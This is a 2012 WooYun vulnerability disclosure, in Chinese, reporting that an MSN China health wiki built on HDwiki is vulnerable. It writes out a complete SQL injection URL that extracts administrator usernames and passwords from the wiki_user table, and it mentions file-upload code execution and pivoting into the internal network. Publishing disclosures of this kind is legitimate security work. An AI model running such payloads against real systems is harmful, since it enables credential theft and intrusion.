漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-06230
漏洞标题:MSN某频道源码漏洞导致任意代码执行及内网渗透
相关厂商:微软
漏洞作者: 路人甲
提交时间:2012-04-20 15:04
修复时间:2012-04-23 15:03
公开时间:2012-04-23 15:03
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-04-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-04-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
由于MSN某频道采用某开源源码,此源码存在较严重漏洞,而且打补丁不及时,导致任意代码执行,从而被成功入侵。
详细说明:
频道地址:
http://wiki.health.msn.com.cn/
些频道采用HDwiki源码,源码存在较多漏洞。
如:
HDwiki文件上传导致远程代码执行漏洞
WooYun: HDwiki文件上传导致远程代码执行漏洞
HDwiki某SQL注射和鸡肋文件包含
WooYun: HDwiki某SQL注射和鸡肋文件包含
HDWiki 5.1 任意用户密码修改漏洞
WooYun: HDWiki 5.1 任意用户密码修改漏洞
等。
先是注入
http://wiki.health.msn.com.cn/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,concat%28username,0x7c,password%29,7,8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20wiki_user%20where%20groupid=4%23
结果如下图。
不过还有更给力的,可以直接上传,即利用第一个漏洞。
具体不说了,看图。。还是内网,可以继续渗透。。。
漏洞证明:
修复方案:
你们比我更懂!
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:11 (WooYun评价)